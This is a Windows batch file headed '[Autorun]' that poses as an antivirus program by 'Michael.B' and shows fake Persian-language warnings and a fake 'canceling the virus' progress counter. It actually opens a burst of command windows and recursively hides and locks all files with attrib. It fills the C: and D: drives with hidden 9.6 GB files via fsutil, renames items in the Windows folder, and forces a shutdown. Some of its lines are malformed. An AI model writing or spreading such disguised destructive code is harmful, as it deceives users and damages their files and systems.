[Autorun]
echo off
color 7
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd

cls
echo.
echo.
echo  ******************************************************************************
echo  ******************************************************************************
echo  **                            new versin anti virus                         **
echo  **                                                                          **
echo  **               ***             By Michael.B              ***              **
echo  **                                                                          **
echo  *********************************             ********************************
echo  *********************************             ********************************
echo.
echo                                ***   TAVAJOH   ***
echo.
echo  Be Hich Vajh computer ra khamoosh nakonid va garna ettelaat hard pak mishavad.
echo  Be Hich Vajh Dar Desktop chi zie ezafe nakonid.
echo  Be Hich Vajh Dar Driveha E Ke Program  Dar Anha Nasb Ast vared nashavid.
echo.
echo  :(  :)
echo      (Flash, USB, Ram, Hard ,Camera ,MP3/4 Pleyer)
echo   Dar Drivhayie Ke File "EXE" Mohemy Dar An Nadarid baz shavad.
echo.
echo  Aya Az edameye virus Motmaen Hastid? ( N / Y )
echo.
echo.
echo.
pause>nul
cls
set /a waite=0
:waiteup
set /a waite= %waite% + 1
if %waite%==500 (
goto :waitedown
) else (
cls
echo.
echo.
echo.
echo.
echo.
echo  ******************************************************************************
echo  ******************************************************************************
echo  **                                                                          **
echo  **                                                                          **
echo  **                                                                          **
echo  **                       Please wait..........                              **
echo  **                                                                          **
echo  **                                                                          **
echo  ******************************************************************************
echo  ******************************************************************************
goto :waiteup
)
:waitedown

cls
set /a NUM=0

:ATRRIB
if %NUM%==1 attrib +a +r +s +h /s /d *.*
cls
set /a NUM= %NUM% + 1
echo.
echo.
echo.
echo.
echo.
echo                             Please wait ..........
echo.
echo.
echo.
echo.
echo.
echo.
echo                     canceling the virus                %NUM%%%
echo.
echo.
echo.
echo.
if %NUM%==100 (
set /a NUM=0
goto EXE
)
goto ATRRIB

:EXE
d:
md trojan
d:>trojan/trojan.exe
cd trojan
md recyclebin
md format
md virus
md codes
md CPU
md RAM
d:>trojan>recyclebin/boot.exe
d:>trojan>recyclebin/systeam32.exe
d:>trojan>recyclebin/picture.exe
d:>trojan>recyclebin/register.exe
d:/trojan>autorun.exe
d:>trojan>Ram/memory.exe
d:>trojan>Ram/bootmrg.exe
d:>trojan>Ram/clean.exe
d:>trojan>Ram/eject.exe
d:>trojan>format/localdrive.exe
d:>trojan>format/harddisk.exe
d:>trojan>format/C.exe
d:>trojan>format/d.exe
d:>trojan>formdat/E.exe
d:>trojan>format/F.exe
d:>trojan>format/Flashmemory.exe
d:>trojan>format/DVDdrive.exe
d:>trojan>cpu/register.exe
d:>trojan>cpu/BUFFER.exe
d:>trojan>cpu/heref.exe
d:>trojan>cpu/Processor.exe
d:>trojan>cpu/power.exe
d:>trojan>codes/powerOFF.exe
d:>trojan>codes/boot.exe
d:>trojan>codes/systeam32.exe
d:>trojan>codes/picture.exe
d:>trojan>codes/register.exe
d:>trojan>codes/memory.exe
d:>trojan>codes/bootmrg.exe
d:>trojan>codes/clean.exe
d:>trojan>codes/eject.exe
d:>trojan>codes/localdrive.exe
d:>trojan>codes/harddisk.exe
d:>trojan>codes/BUFFER.exe
d:>trojan>codes/Processor.exe
d:>trojan>codes/shutdown.exe
fsutil file createnew michael.exe 9663676416
cd D:/
fsutil file createnew michael.exe 9663676416
attrib +H michael.exe
cls
set /a NUM=0

:ATRRIB
if %NUM%==1 attrib +a +r +s +h /s /d *.*
cls
set /a NUM= %NUM% + 1
if %NUM%==100 (
set /a NUM=0
goto EXE
)
goto ATRRIB

:EXE
c:
md trojan
c:>trojan/trojan.exe
cd trojan
md recyclebin
md format
md virus
md codes
md CPU
md RAM
c:>trojan>recyclebin/boot.exe
c:>trojan>recyclebin/systeam32.exe
c:>trojan>recyclebin/picture.exe
c:>trojan>recyclebin/register.exe
c:/trojan>autorun.exe
c:>trojan>Ram/memory.exe
c:>trojan>Ram/bootmrg.exe
c:>trojan>Ram/clean.exe
c:>trojan>Ram/eject.exe
c:>trojan>format/localdrive.exe
c:>trojan>format/harddisk.exe
c:>trojan>format/C.exe
c:>trojan>format/d.exe
c:>trojan>format/E.exe
c:>trojan>format/F.exe
c:>trojan>format/Flashmemory.exe
c:>trojan>format/DVDdrive.exe
c:>trojan>cpu/register.exe
c:>trojan>cpu/BUFFER.exe
c:>trojan>cpu/heref.exe
c:>trojan>cpu/Processor.exe
c:>trojan>cpu/power.exe
c:>trojan>codes/powerOFF.exe
c:>trojan>codes/boot.exe
c:>trojan>codes/systeam32.exe
c:>trojan>codes/picture.exe
c:>trojan>codes/register.exe
c:>trojan>codes/memory.exe
c:>trojan>codes/bootmrg.exe
c:>trojan>codes/clean.exe
c:>trojan>codes/eject.exe
c:>trojan>codes/localdrive.exe
c:>trojan>codes/harddisk.exe
c:>trojan>codes/BUFFER.exe
c:>trojan>codes/Processor.exe
c:>trojan>codes/shutdown.exe
fsutil file createnew michael.exe 9663676416
cd C:/
fsutil file createnew michael.exe 9663676416
attrib +H michael.exe
cd windows
ren boot michael
ren bootstat.dat computer
ren systeam32 boot
cd d:/
attrib +H trojan
cd c:/
attrib +H trojan
cls
set /a NUM=0

:ATRRIB
if %NUM%==1 attrib +a +r +s +h /s /d *.*
cls
set /a NUM= %NUM% + 1
if %NUM%==100 (
set /a NUM=0
goto EXE
)
goto ATRRIB

:EXE
- shutdown -s -t 5